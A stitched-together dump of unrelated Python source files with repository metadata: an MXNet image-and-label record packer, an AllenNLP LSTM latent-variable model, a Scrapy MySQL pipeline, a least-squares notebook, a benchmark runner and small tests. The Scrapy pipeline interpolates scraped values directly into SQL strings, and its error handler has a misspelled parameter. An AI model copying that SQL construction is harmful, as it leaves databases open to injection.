----------
idx : int
Index of a file.
buf :
Record to write.
"""
key = self.key_type(idx)
pos = self.tell()
self.write(buf)
self.fidx.write('%s\t%d\n'%(str(key), pos))
self.idx[key] = pos
self.keys.append(key)
ISegRHeader = namedtuple('HEADER', ['flag', 'label', 'image_size', 'label_size', 'id', 'id2'])
"""An alias for HEADER. Used to store metadata (e.g. labels) accompanying a record.
See mxnet.recordio.pack and mxnet.recordio.pack_img for example uses.
Parameters
----------
flag : int
Available for convenience, can be set arbitrarily.
label : float or an array of float
Typically used to store label(s) for a record.
image_size: int
length of image string.
label_size: int
length of label string.
id: int
Usually a unique id representing record.
id2: int
Higher order bits of the unique id, should be set to 0 (in most cases).
"""
_ISEGR_FORMAT = 'IfIIQQ'
_IR_SIZE = struct.calcsize(_ISEGR_FORMAT)
def pack(header, image_data, label_data):
"""Pack a string into MXImageRecord.
Parameters
----------
header : ISegRHeader
Header of the image record.
image_data : str
Raw image string to be packed.
label_data : str
Raw label string to be packed.
Returns
-------
s : str
The packed string.
Examples
--------
>>> id = 2574
>>> img = cv2.imread(fullpath, cv2.IMREAD_COLOR)
>>> ret, buf = cv2.imencode(".jpg", img)
>>> assert ret, 'failed to encode image'
>>> image_data = buf.tostring()
>>> image_len = len(image_data)
>>> label_path = item[-1]
>>> label = cv2.imread(label_path, cv2.IMREAD_GRAYSCALE)
>>> ret, buf = cv2.imencode(".png", label)
>>> assert ret, 'failed to encode label'
>>> label_data = buf.tostring()
>>> label_len = len(label_data)
>>> header = mx.seg_recordio.ISegRHeader(0, 0, image_len, label_len, id, 0)
>>> packed_s = mx.seg_recordio.pack(header, image_data, label_data)
"""
# test_s = image_data + label_data
# test_len = len(test_s)
# image_len = len(image_data)
# label_len = len(label_data)
header = ISegRHeader(*header)
s = struct.pack(_ISEGR_FORMAT, *header) + image_data + label_data
# total_len = len(s)
# if (image_len + label_len) != (header.image_size + header.label_size):
# print("{}<>{}+{}".format(total_len, header.image_size, header.label_size))
return s
def unpack(s):
"""Unpack a MXImageRecord to string.
Parameters
----------
s : str
String buffer from ``MXRecordIO.read``.
Returns
-------
header : IRHeader
Header of the image record.
s : str
Unpacked string.
Examples
--------
>>> record = mx.seg_recordio.MXSegRecordIO('test.rec', 'r')
>>> item = record.read()
>>> header, s = mx.seg_recordio.unpack(item)
>>> header
HEADER(flag=0, label=0, image_len=368032, label_len=38742, id=20129312, id2=0)
"""
header = ISegRHeader(*struct.unpack(_ISEGR_FORMAT, s[:_IR_SIZE]))
s = s[_IR_SIZE:]
if header.flag > 0:
s = s[header.flag*4:]
return header, s
def unpack_img(s, iscolor=-1):
"""Unpack a MXImageSegRecord to image.
Parameters
----------
s : str
String buffer from ``MXSegRecordIO.read``.
iscolor : int
Image format option for ``cv2.imdecode``.
Returns
-------
header : IRHeader
Header of the image record.
img : numpy.ndarray
Unpacked image.
Examples
--------
>>> record = mx.seg_recordio.MXSegRecordIO('test.rec', 'r')
>>> item = record.read()
>>> header, img, label = mx.seg_recordio.unpack_img(item)
>>> header
HEADER(flag=0, label=0, id=20129312, id2=0)
>>> img
array([[[ 23, 27, 45],
[ 28, 32, 50],
...,
[ 36, 40, 59],
[ 35, 39, 58]],
...,
[[ 91, 92, 113],
[ 97, 98, 119],
...,
[168, 169, 167],
[166, 167, 165]]], dtype=uint8)
"""
header, s = unpack(s)
image_data = np.frombuffer(s, dtype=np.uint8, count=header.image_size, offset=0)
label_data = np.frombuffer(s, dtype=np.uint8, count=header.label_size, offset=header.image_size)
assert cv2 is not None
image = cv2.imdecode(image_data, cv2.IMREAD_COLOR)
label = cv2.imdecode(label_data, cv2.IMREAD_GRAYSCALE)
return header, image, label
def pack_img(header, img, label, quality=95, img_fmt='.jpg', label_fmt='.png'):
"""Pack an image into ``MXImageRecord``.
Parameters
----------
header : IRHeader
Header of the image record.
img : numpy.ndarray
Image to be packed.
label: numpy.ndarry
Label to be packed
quality : int
Quality for JPEG encoding in range 1-100, or compression for PNG encoding in range 1-9.
img_fmt : str
Encoding of the image (.jpg for JPEG, .png for PNG).
label_fmt : str
Encoding of the label (.jpg for JPEG, .png for PNG).
Returns
-------
s : str
The packed string.
Examples
--------
>>> id = 2574
>>> image = cv2.imread('test.jpg', cv2.IMREAD_COLOR)
>>> ret, buf = cv2.imencode(".jpg", img)
>>> assert ret, 'failed to encode image'
>>> image_data = buf.tostring()
>>> image_len = len(image_data)
>>> label = cv2.imread('test.png', cv2.IMREAD_GRAYSCALE)
>>> ret, buf = cv2.imencode(".png", label)
>>> assert ret, 'failed to encode label'
>>> label_data = buf.tostring()
>>> label_len = len(label_data)
>>> header = mx.seg_recordio.ISegRHeader(0, 0, image_len, label_len, id, 0)
>>> packed_s = mx.seg_recordio.pack_img(header, image, label)
"""
assert cv2 is not None
encode_params = None
jpg_formats = ['.JPG', '.JPEG']
png_formats = ['.PNG']
if img_fmt.upper() in jpg_formats:
encode_params = [cv2.IMWRITE_JPEG_QUALITY, quality]
elif img_fmt.upper() in png_formats:
encode_params = [cv2.IMWRITE_PNG_COMPRESSION, quality]
ret, buf = cv2.imencode(img_fmt, img, encode_params)
assert ret, 'failed to encode image'
image_data = buf.tostring()
if label_fmt.upper() in jpg_formats:
encode_params = [cv2.IMWRITE_JPEG_QUALITY, quality]
elif label_fmt.upper() in png_formats:
encode_params = [cv2.IMWRITE_PNG_COMPRESSION, quality]
ret, buf = cv2.imencode(label_fmt, label, encode_params)
assert ret, 'failed to encode image'
label_data = buf.tostring()
image_len = len(image_data)
label_len = len(label_data)
header = ISegRHeader(header.flag, header.label, image_len, label_len, header.id, 0)
return pack(header, image_data, label_data)
|
[
"zhangbenxing@kuandeng.com"
] |
zhangbenxing@kuandeng.com
|
3652ed9c9aa0576a74edaf5107cd392b4e4156b3
|
85c873074683ce54ab6056c42ca745f672867d72
|
/quora/lstm_lvm/model.py
|
415184aa3fd978ae5dcc8e9172689184ed6ff217
|
[] |
no_license
|
jihunchoi/cross-sentence-lvm-public
|
46dbbec5c5cba3db38d42437f7f30dd4e4659fab
|
c48f890dc994fb538b47bea864c5bc3d182b622e
|
refs/heads/master
| 2022-11-25T08:19:14.639728
| 2020-07-28T05:25:51
| 2020-07-28T05:25:51
| 283,109,097
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,256
|
py
|
from typing import Any, Dict, Optional, Union, List
import torch
from torch import nn
from torch.distributions import Categorical
from torch.nn import functional
from allennlp.common.params import Params
from allennlp.data.vocabulary import Vocabulary
from allennlp.models.model import Model
from allennlp.modules.feedforward import FeedForward
from allennlp.modules.token_embedders import Embedding
from allennlp.modules.seq2seq_encoders import PytorchSeq2SeqWrapper
from allennlp.modules.seq2vec_encoders import PytorchSeq2VecWrapper
from allennlp.nn.activations import Activation
from allennlp.nn.util import (
get_text_field_mask, sequence_cross_entropy_with_logits
)
from allennlp.training.metrics import CategoricalAccuracy
from modules.code_generators import GaussianCodeGenerator, VmfCodeGenerator
from utils.metrics import ScalarMetric
class SeparatedQuoraModel(Model):
_NUM_LABELS = 2
def __init__(self,
params: Params,
vocab: Vocabulary) -> None:
super().__init__(vocab=vocab)
enc_hidden_dim = params.pop_int('enc_hidden_dim', 300)
gen_hidden_dim = params.pop_int('gen_hidden_dim', 300)
disc_hidden_dim = params.pop_int('disc_hidden_dim', 1200)
disc_num_layers = params.pop_int('disc_num_layers', 1)
code_dist_type = params.pop_choice(
'code_dist_type', ['gaussian', 'vmf'],
default_to_first_choice=True)
code_dim = params.pop_int('code_dim', 300)
tie_embedding = params.pop_bool('tie_embedding', False)
emb_dropout = params.pop_float('emb_dropout', 0.0)
disc_dropout = params.pop_float('disc_dropout', 0.0)
l2_weight = params.pop_float('l2_weight', 0.0)
self.emb_dropout = nn.Dropout(emb_dropout)
self.disc_dropout = nn.Dropout(disc_dropout)
self._l2_weight = l2_weight
self._token_embedder = Embedding.from_params(
vocab=vocab, params=params.pop('token_embedder'))
self._encoder = PytorchSeq2VecWrapper(
nn.LSTM(input_size=self._token_embedder.get_output_dim(),
hidden_size=enc_hidden_dim, batch_first=True))
self._generator = PytorchSeq2SeqWrapper(
nn.LSTM(input_size=(self._token_embedder.get_output_dim()
+ code_dim),
hidden_size=gen_hidden_dim, batch_first=True))
self._generator_projector = nn.Linear(
in_features=self._generator.get_output_dim(),
out_features=vocab.get_vocab_size())
if tie_embedding:
self._generator_projector.weight = self._token_embedder.weight
if code_dist_type == 'vmf':
vmf_kappa = params.pop_int('vmf_kappa', 150)
self._code_generator = VmfCodeGenerator(
input_dim=self._encoder.get_output_dim(),
code_dim=code_dim, kappa=vmf_kappa)
elif code_dist_type == 'gaussian':
self._code_generator = GaussianCodeGenerator(
input_dim=self._encoder.get_output_dim(),
code_dim=code_dim)
else:
raise ValueError('Unknown code_dist_type')
self._discriminator = FeedForward(
input_dim=2 * self._code_generator.get_output_dim(),
hidden_dims=[disc_hidden_dim]*disc_num_layers + [self._NUM_LABELS],
num_layers=disc_num_layers + 1,
activations=[Activation.by_name('relu')()] * disc_num_layers
+ [Activation.by_name('linear')()],
dropout=disc_dropout)
self._kl_weight = 1.0
self._discriminator_weight = params.pop_float(
'discriminator_weight', 0.1)
self._gumbel_temperature = 1.0
# Metrics
self._metrics = {
'generator_loss': ScalarMetric(),
'kl_divergence': ScalarMetric(),
'discriminator_accuracy': CategoricalAccuracy(),
'discriminator_loss': ScalarMetric(),
'loss': ScalarMetric()
}
def get_regularization_penalty(self):
sum_sq = sum(p.pow(2).sum() for p in self.parameters())
l2_norm = sum_sq.sqrt()
return self.l2_weight * l2_norm
@property
def l2_weight(self):
return self._l2_weight
@property
def kl_weight(self):
return self._kl_weight
@kl_weight.setter
def kl_weight(self, value):
self._kl_weight = value
@property
def discriminator_weight(self):
return self._discriminator_weight
@discriminator_weight.setter
def discriminator_weight(self, value):
self._discriminator_weight = value
def embed(self, tokens: torch.Tensor) -> torch.Tensor:
return self._token_embedder(tokens)
def encode(self,
inputs: torch.Tensor,
mask: torch.Tensor,
drop_start_token: bool = True) -> torch.Tensor:
if drop_start_token:
inputs = inputs[:, 1:]
mask = mask[:, 1:]
enc_hidden = self._encoder(inputs.contiguous(), mask)
return enc_hidden
def sample_code_and_compute_kld(self,
hidden: torch.Tensor) -> torch.Tensor:
return self._code_generator(hidden)
def discriminate(self,
premise_hidden: torch.Tensor,
hypothesis_hidden: torch.Tensor) -> torch.Tensor:
disc_input = torch.cat(
[premise_hidden + hypothesis_hidden,
(premise_hidden - hypothesis_hidden).abs()],
dim=-1)
disc_input = self.disc_dropout(disc_input)
disc_logits = self._discriminator(disc_input)
return disc_logits
def construct_generator_inputs(self,
embeddings: torch.Tensor,
code: torch.Tensor) -> torch.Tensor:
batch_size, max_length, _ = embeddings.shape
code_expand = code.unsqueeze(1).expand(
batch_size, max_length, -1)
inputs = torch.cat([embeddings, code_expand], dim=-1)
return inputs
def generate(self,
code: torch.Tensor,
max_length: torch.Tensor) -> torch.Tensor:
start_index = self.vocab.get_token_index('<s>')
end_index = self.vocab.get_token_index('</s>')
pad_index = 0
done = torch.zeros_like(max_length).long()
max_max_length = max_length.max().item()
prev_word = (torch.empty_like(done).long().unsqueeze(1)
.fill_(start_index))
generated = []
self._generator.stateful = True
self._generator.reset_states()
for t in range(max_max_length):
if done.byte().all():
break
prev_word_emb = self.embed(prev_word)
input_t = self.construct_generator_inputs(
embeddings=prev_word_emb, code=code)
hidden_t = self._generator(input_t, 1 - done.unsqueeze(1))
pred_t = self._generator_projector(hidden_t).argmax(2)
pred_t.masked_fill_(done.byte(), pad_index)
generated.append(pred_t)
done.masked_fill_(pred_t.eq(end_index).squeeze(1), 1)
done.masked_fill_(max_length.le(t + 1), 1)
prev_word = pred_t
self._generator.stateful = False
generated = torch.cat(generated, dim=1)
return generated
def convert_to_readable_text(self,
generated: torch.Tensor) -> List[List[str]]:
sequences = [seq.cpu().tolist() for seq in generated.unbind(0)]
readable_sequences = []
for seq in sequences:
readable_seq = []
for word_index in seq:
if word_index != 0:
word = self.vocab.get_token_from_index(word_index)
readable_seq.append(word)
readable_sequences.append(readable_seq)
return readable_sequences
def compute_generator_loss(self,
embeddings: torch.Tensor,
code: torch.Tensor,
targets: torch.Tensor,
mask: torch.Tensor) -> torch.Tensor:
inputs = self.construct_generator_inputs(
embeddings=embeddings, code=code)
hiddens = self._generator(inputs.contiguous(), mask)
logits = self._generator_projector(hiddens)
weights = mask.float()
loss = sequence_cross_entropy_with_logits(
logits=logits, targets=targets.contiguous(), weights=weights,
average=None)
return loss
def forward(self,
premise: Dict[str, torch.Tensor],
hypothesis: Dict[str, torch.Tensor],
label: Optional[torch.Tensor] = None) -> Dict[str, Any]:
"""
premise and hypothesis are padded with
the BOS and the EOS token.
"""
pre_mask = get_text_field_mask(premise)
hyp_mask = get_text_field_mask(hypothesis)
pre_tokens = premise['tokens']
hyp_tokens = hypothesis['tokens']
pre_token_embs = self.embed(pre_tokens)
hyp_token_embs = self.embed(hyp_tokens)
pre_token_embs = self.emb_dropout(pre_token_embs)
hyp_token_embs = self.emb_dropout(hyp_token_embs)
output_dict = {}
pre_hidden = self.encode(
inputs=pre_token_embs, mask=pre_mask, drop_start_token=True)
hyp_hidden = self.encode(
inputs=hyp_token_embs, mask=hyp_mask, drop_start_token=True)
pre_code, pre_kld = self.sample_code_and_compute_kld(pre_hidden)
hyp_code, hyp_kld = self.sample_code_and_compute_kld(hyp_hidden)
pre_kld = pre_kld.mean()
hyp_kld = hyp_kld.mean()
pre_gen_mask = pre_mask[:, 1:]
hyp_gen_mask = hyp_mask[:, 1:]
pre_gen_loss = self.compute_generator_loss(
embeddings=pre_token_embs[:, :-1], code=pre_code,
targets=pre_tokens[:, 1:], mask=pre_gen_mask)
hyp_gen_loss = self.compute_generator_loss(
embeddings=hyp_token_embs[:, :-1], code=hyp_code,
targets=hyp_tokens[:, 1:], mask=hyp_gen_mask)
pre_gen_loss = pre_gen_loss.mean()
hyp_gen_loss = hyp_gen_loss.mean()
gen_loss = pre_gen_loss + hyp_gen_loss
kld = pre_kld + hyp_kld
loss = gen_loss + self.kl_weight*kld
if label is not None:
disc_logits = self.discriminate(premise_hidden=pre_code,
hypothesis_hidden=hyp_code)
disc_loss = functional.cross_entropy(
input=disc_logits, target=label)
loss = loss + self.discriminator_weight*disc_loss
output_dict['discriminator_loss'] = disc_loss
self._metrics['discriminator_loss'](disc_loss)
self._metrics['discriminator_accuracy'](
predictions=disc_logits, gold_labels=label)
output_dict['generator_loss'] = gen_loss
output_dict['kl_divergence'] = kld
output_dict['loss'] = loss
self._metrics['generator_loss'](gen_loss)
self._metrics['kl_divergence'](kld)
self._metrics['loss'](loss)
return output_dict
def get_metrics(self, reset: bool = False
) -> Dict[str, Union[float, Dict[str, float]]]:
metrics = {k: v.get_metric(reset=reset)
for k, v in self._metrics.items()}
metrics['kl_weight'] = self.kl_weight
metrics['discriminator_weight'] = self.discriminator_weight
return metrics
def test_labeled():
from pprint import pprint
params = Params({
'token_embedder': {
'num_embeddings': 4,
'embedding_dim': 3
},
'code_dist_type': 'vmf',
'vmf_kappa': 100
})
vocab = Vocabulary()
while True:
vocab_size = vocab.get_vocab_size()
if vocab_size == 4:
break
vocab.add_token_to_namespace('a' + str(vocab_size))
model = SeparatedQuoraModel(params=params, vocab=vocab)
premise = {'tokens': torch.randint(low=0, high=4, size=(5, 6))}
hypothesis = {'tokens': torch.randint(low=0, high=4, size=(5, 7))}
label = torch.randint(low=0, high=3, size=(5,))
output = model(premise=premise, hypothesis=hypothesis, label=label)
pprint(output)
pprint(model.get_metrics())
def test_unlabeled():
from pprint import pprint
params = Params({
'token_embedder': {
'num_embeddings': 4,
'embedding_dim': 3
},
'code_dist_type': 'gaussian'
})
vocab = Vocabulary()
while True:
vocab_size = vocab.get_vocab_size()
if vocab_size == 4:
break
vocab.add_token_to_namespace('a' + str(vocab_size))
model = SeparatedQuoraModel(params=params, vocab=vocab)
premise = {'tokens': torch.randint(low=0, high=4, size=(5, 6))}
hypothesis = {'tokens': torch.randint(low=0, high=4, size=(5, 7))}
output = model(premise=premise, hypothesis=hypothesis, label=None)
pprint(output)
pprint(model.get_metrics())
if __name__ == '__main__':
test_labeled()
test_unlabeled()
|
[
"jhchoi@europa.snu.ac.kr"
] |
jhchoi@europa.snu.ac.kr
|
6b35c592f8a2cbebcbf7547605a3603a6085d533
|
c042600d495d90a70fce0ce8dc24b88951994ed7
|
/LiteratureBooks/pipelines.py
|
14616d164683728b418f3055016487aba968b913
|
[] |
no_license
|
JC5137/distributeSpider
|
b8c938be3033f77f06c8ae57c96a81c9a2d2439a
|
9c068503f34b3bc14e055f70903b3c81b32e09d0
|
refs/heads/master
| 2021-04-12T11:50:17.689045
| 2017-07-12T13:44:37
| 2017-07-12T13:44:37
| 94,546,730
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,543
|
py
|
# -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html
import MySQLdb
import MySQLdb.cursors
import logging
from twisted.enterprise import adbapi
class LiteraturebooksPipeline(object):
def __init__(self,dbpool):
self.dbpool = dbpool
@classmethod
def from_settings(cls, settings):
mysql_args = dict(
host=settings['MYSQL_HOST'],
db=settings['MYSQL_DBNAME'],
user=settings['MYSQL_USER'],
passwd=settings['MYSQL_PASSWD'],
charset='utf8',
cursorclass = MySQLdb.cursors.DictCursor,
use_unicode= True,
)
dbpool = adbapi.ConnectionPool('MySQLdb', **mysql_args)
return cls(dbpool)
#pipeline默认调用
def process_item(self, item, spider):
if "Amzon" in spider.name:
d = self.dbpool.runInteraction(self._do_insert, item, spider)
d.addErrback(self._handle_error, item, spider)
d.addBoth(lambda _: item)
return d
if "Jd" in spider.name:
d = self.dbpool.runInteraction(self._do_update, item, spider)
d.addErrback(self._handle_error, item, spider)
d.addBoth(lambda _: item)
return d
#写入数据库
def _do_insert(self, conn, item, spider):
parms = (item["book_id_amzon"],item["book_url_amzon"],item['book_name'],item['book_comments_num_amzon'],item['book_price_amzon'])
sql = """insert into book_info
(book_id_amzon,
book_url_amzon,
book_name,
book_comments_num_amzon,
book_price_amzon
)
values ('%s','%s','%s',%d,'%s')""" %parms
print sql
conn.execute(sql)
#更新数据库
def _do_update(self, conn, item, spider):
parms = (item["book_url_jd"],item["book_comments_num_jd"],item["book_price_jd"],item["book_name"],item["book_id_amzon"])
sql = """update book_info set
book_url_jd = '%s',
book_comments_sum_jd = '%d',
book_price_jd = '%s'
where book_name = '%s' and book_id_amzon = '%s'""" %parms
print sql
conn.execute(sql)
#异常处理
def _handle_error(self, failue, item, spider):
logger = logging.getLogger("DB")
logger.error(failure)
|
[
"834096423@qq.com"
] |
834096423@qq.com
|
fbb0c4e5b8fe265c6360855246cde8f9766f8dcf
|
7df98e150bb9bf9c4ef3299a00e70de80ef0fdad
|
/04-estimation/01-intro-to-estimation/website/22. Least Squares Notebook/Least-Squares-Solution.py
|
a8c9cc81fb40cb6d332f32dbed702c7e4ffeaa28
|
[] |
no_license
|
AkshadK/autonomous-flight-course-notes
|
fda761a31f2e208eab241bc4823fcf4dfa86a22b
|
6dc4cdf765c3018eb90c4e806d46841669d37c9e
|
refs/heads/master
| 2023-05-02T23:51:09.677180
| 2020-05-17T13:57:42
| 2020-05-17T13:57:42
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,841
|
py
|
#!/usr/bin/env python
# coding: utf-8
# # Least Squares
#
# In this notebook you'll use least squares to estimate a state vector $x$, given $m$ noisy measurements derived from:
#
# $
# \tilde{y} = Hx + v
# $
#
# $v$ is sampled from gaussian $N(0, R)$, and $H$ is a matrix mapping the state space to the measurement space. We'll assume x is constant, meaning the vehicle is currently not moving.
#
# Thus you'll want to select an estimate of the state $x$, $\hat{x}$ which maximizes the likelihood of the observed measurements $\tilde{y}$:
#
# $
# p(y = \tilde{y} | x = \hat{x})
# $
# In[2]:
import numpy as np
import matplotlib.pyplot as plt
import numpy.linalg as LA
get_ipython().run_line_magic('matplotlib', 'inline')
# ### Setup
# In[3]:
# number of samples
# the larger this value the more
# accurate the x hat will be.
n_samples = 100
# size of state
n = 4
# In[4]:
def make_H(m, degree, t):
"""
Creates a matrix where
each row is of the form:
[t**degree, t**(degree-1), ..., 1]
"""
H = np.zeros((m, degree))
for i in np.arange(degree-1, -1, -1):
H[:, -i-1] = t**i
return H
# In[5]:
# known constants
t = np.random.uniform(-5, 5, n_samples)
H = make_H(n_samples, n, t)
# state, unknown in practice
x = np.random.randn(n) * 2
# ### Collecting Observations
#
# First you'll have to collect $m$ noisy observations, these will be used later to estimate $x$.
#
# **NOTE: You may have not encountered the `@` syntax. In a nutshell, `np.dot(H, x)` is equivalent to `H @ x`. If the equation contains multiple matrix multiplications, using `@` provides a much more comprehensible expression. **
# In[6]:
# TODO: collect m noisy observations, the noise distribution should be gaussian
y_obs = H @ x + np.random.normal(0, 1, size=(n_samples))
# In[7]:
plt.plot(t, y_obs, 'bx')
plt.title("Noisy Observations")
# The observations plot produces a polynomial of order `len(x) - 1`, i.e. a 4-element state produces a 3rd order polynomial. In this case the state $x$ are the coefficients of the polynomial. By generating observation from evaluating the polynomial at several different points we can gain a good approximation of the original state.
#
# As one might imagine, recovering a good approximation of the state requires more samples as the order of the polynomial increases.
# ### Estimating $x$
#
# Given enough samples $\hat{x}$ should converge to $x$. The exact number of measurements required depends on the complexity of mapping the state space to the measurement space, $H$ and how noisy the measurements are, determined by $v$.
#
# Recall from lecture:
#
# $
# \hat{x} = (H^T H)^{-1} H^T \tilde{y}
# $
#
# $\hat{x}$ should be similar to $x$.
# In[8]:
x_hat = LA.pinv(H.T @ H) @ H.T @ y_obs
# In[9]:
print(x_hat)
print(x)
# In[ ]:
|
[
"arush@ilovebrands.net"
] |
arush@ilovebrands.net
|
623d7b812b2e43e3541b088ba3b63a76c0ac5857
|
20569ea832802e5dadde2cbc4c144ff02d85d355
|
/utils/BenchmarkRunner.py
|
fa230c9af28272b4a1fb6624842c5d4cd34f65b6
|
[
"MIT"
] |
permissive
|
bwhub/CONVJSSP
|
6017359f7bf21a1e257df121baf3f83fc22a80ba
|
dd9084dc370e6113df749b247ee05670e46fca3f
|
refs/heads/master
| 2023-02-01T15:18:43.057072
| 2020-12-14T17:10:26
| 2020-12-14T17:10:26
| 299,891,152
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,125
|
py
|
import subprocess
from tqdm import tqdm
import itertools as it
import os
import multiprocessing as mp
class BenchmarkRunner:
def __init__(self, log_dir, exec_path="../src/job-shop-experiment/job-shop", repeat_time=1, warmup_seconds=0):
self.exec_path = exec_path + " "
self.log_dir = log_dir
self.repeat_time = repeat_time
self.available_parameter_dict, self.available_instance_list = self._get_avaialbe_benchmark_options()
print("# Length of the available instance list is {}".format(len(self.available_instance_list)))
self.test_parameter_dict = {}
self.test_instance_list = []
self.warmup_seconds = warmup_seconds
# add testing parameters
def _run_single_command(self, cmd_str):
# function to execute a single command
p = subprocess.Popen(cmd_str.split(), stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
output, err = p.communicate()
return output.decode('utf-8')
def run_test(self, log_dir=None):
if log_dir==None:
log_dir = self.log_dir
all_parameter_names = sorted(self.test_parameter_dict)
# all_parameter_names = self.test_parameter_dict
parameter_combination_list = list(it.product(*((self._add_key_2_every_val(para_name, self.test_parameter_dict[para_name]) for para_name in all_parameter_names))))
testing_list = [ (list(para)+[instance]) for para in parameter_combination_list for instance in self.test_instance_list]
# print(testing_list)
result_list = []
if(self.warmup_seconds > 0):
print("Staring warmup for {} seconds".format(self.warmup_seconds))
self._run_single_command('stress --cpu 1 --timeout ' + str(self.warmup_seconds))
print("Finished warmup. Now starting the benchmark.")
for i in range(self.repeat_time):
for test in tqdm(testing_list):
cmd = self.exec_path + " ".join(test)
log_file_name = self.log_dir + " ".join(test).replace(" ", "_").replace("-", "")+"_run_"+str(i)+".log"
exists = os.path.isfile(log_file_name)
if not exists:
# run a single benchmark
result = self._run_single_command(cmd)
# write the result to a log file
with open(log_file_name, "w") as log_file:
log_file.write(cmd)
log_file.write('\n')
log_file.write(result)
result_list.append(result)
return result_list
def _run_single_command(self, cmd_str):
# function to execute a single command
p = subprocess.Popen(cmd_str.split(), stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
output, err = p.communicate()
return output.decode('utf-8')
def run_test_parallel(self, log_dir=None, process_count=mp.cpu_count()):
if process_count > mp.cpu_count():
print('number of of process should be smaller than cpu_count.')
process_count = mp.cpu_count()
if log_dir==None:
log_dir = self.log_dir
all_parameter_names = sorted(self.test_parameter_dict)
# all_parameter_names = self.test_parameter_dict
parameter_combination_list = list(it.product(*((self._add_key_2_every_val(para_name, self.test_parameter_dict[para_name]) for para_name in all_parameter_names))))
testing_list = [ (list(para)+[instance]) for para in parameter_combination_list for instance in self.test_instance_list]
# print(testing_list)
result_list = []
if(self.warmup_seconds > 0):
print("Staring warmup for {} seconds".format(self.warmup_seconds))
self._run_single_command('stress --cpu 1 --timeout ' + str(self.warmup_seconds))
print("Finished warmup. Now starting the benchmark.")
print("The first element in testing list is {}".format(testing_list[0]))
with mp.Pool(process_count) as pool:
result_list = pool.starmap_async(self._run_single_JSSP_instance, [(test, 0) for test in testing_list]).get()
# for i in range(self.repeat_time):
# for test in tqdm(testing_list):
# pool.apply_async(self._run_single_JSSP_instance, args=(test, i))
return result_list
def _run_single_JSSP_instance(self, test, repeat_time):
cmd = self.exec_path + " ".join(test)
log_file_name = self.log_dir + " ".join(test).replace(" ", "_").replace("-", "")+"_run_"+str(repeat_time)+".log"
exists = os.path.isfile(log_file_name)
if not exists:
# run a single benchmark
result = self._run_single_command(cmd)
# write the result to a log file
with open(log_file_name, "w") as log_file:
log_file.write(cmd)
log_file.write('\n')
log_file.write(result)
return result
# def add_testing_instances(self, instance_list):
# print("Start add_testing_instances")
# for instance in instance_list:
# if instance.split()[-1] in self.available_instance_list:
# self.test_instance_list.append(instance)
def add_testing_instances(self, instance_list):
print("Start add_testing_instances")
for instance in instance_list:
self.test_instance_list.append(instance)
def _add_key_2_every_val(self, key, val_list):
return [(key + " " + v) for v in val_list]
def add_parameter_options(self, para_dict):
# add values for benchmarks for one parameter
assert len(para_dict) == 1, 'Please add one parameter at a time'
key = list(para_dict.keys())[0]
assert key in self.available_parameter_dict, 'Parameter {} is not avaiable'.format(key)
val = para_dict[key]
self.test_parameter_dict[key] = val
def get_current_test_instances(self):
return self.test_instance_list
def get_current_test_parameters(self):
return self.test_parameter_dict
def get_available_instance_list(self):
return self.available_instance_list
def _get_avaialbe_benchmark_options(self, exec_path=None, help_cmd=' --help'):
# get available parameter options from the program
if exec_path==None:
exec_path = self.exec_path
help_str = self._run_single_command(exec_path + help_cmd)
help_list = help_str.replace('\t', ' ').replace('\n', ' ').split(' ')
# get parameter options
parameter_list = [x for x in help_list if x.startswith('-') and len(x) >1][3:]
parameter_dict = {}
for option in parameter_list:
parameter_dict[option] = []
# get jssp instance options
instance_list = "".join(help_list[help_list.index('instances:')+1:]).split(',')[:-1]
return parameter_dict, instance_list
|
[
"blakewang@live.com"
] |
blakewang@live.com
|
347412fdfa9287d03bb131ce4771ae5ddacded33
|
4d5721457ae7856c11c869c5966a36416e1144c3
|
/djagno_pg_trgm/urls.py
|
1a25a241b46a0c0c72b051c4439ebc836c906d89
|
[] |
no_license
|
Zlira/django_pg_trgm
|
dd65df6caf372f2777db73d85c815eab661abd9d
|
59ad1b95a8a08783af856b200b53a793d1d8b403
|
refs/heads/master
| 2016-09-13T12:54:17.202890
| 2016-05-02T11:29:44
| 2016-05-02T11:29:44
| 57,662,880
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 283
|
py
|
from django.conf.urls import patterns, include, url
from django.contrib import admin
urlpatterns = patterns('',
# Examples:
# url(r'^$', 'djagno_pg_trgm.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^admin/', include(admin.site.urls)),
)
|
[
"olesia.hr@gmail.com"
] |
olesia.hr@gmail.com
|
9fa2c72d698228f49d9a9ff9bacf0479f901071d
|
a79faf54ba4e6b8a1223d17b9b242fc7c52e7342
|
/test/tagger_test/test_ec2_tagger.py
|
ce170114b362d92fbd80e140bc549d14d19b538e
|
[
"Apache-2.0"
] |
permissive
|
sahajsoft/LUAU
|
773193cb549752a202a03d388e463ad11181af2e
|
1578fb971fb745d8ca4c42ff9c1ee0a1c7480194
|
refs/heads/master
| 2021-06-25T23:49:03.730066
| 2020-10-16T13:01:28
| 2020-10-16T13:01:28
| 153,218,839
| 1
| 1
|
Apache-2.0
| 2019-02-06T07:44:53
| 2018-10-16T03:45:03
|
Python
|
UTF-8
|
Python
| false
| false
| 709
|
py
|
import unittest
import json
import boto3
import os
from mock import MagicMock
from moto import mock_autoscaling, mock_ec2
from tagger.ec2_tagger import EC2Tagger
class TestEC2Tagger(unittest.TestCase):
@mock_ec2
def setUp(self):
json_data = open('./test/example_events/run_instances.json').read()
self.event = json.loads(json_data)
self.region = 'us-west-2'
os.environ['AWS_REGION'] = 'us-west-2'
@mock_ec2
def test_start(self):
self.tagger = EC2Tagger(self.event, None)
response = self.tagger.start()
response_metadata = response['ResponseMetadata']
self.assertEqual(response_metadata['HTTPStatusCode'], 200)
|
[
"keithwhitley@Keiths-MacBook-Pro.local"
] |
keithwhitley@Keiths-MacBook-Pro.local
|
87418f41882ec35f3c52caae603025eb269fc11b
|
31473c88fbfb0dbd436468b7535787cdc91ce472
|
/ItemFastAPI/env/Lib/site-packages/poetry/core/__init__.py
|
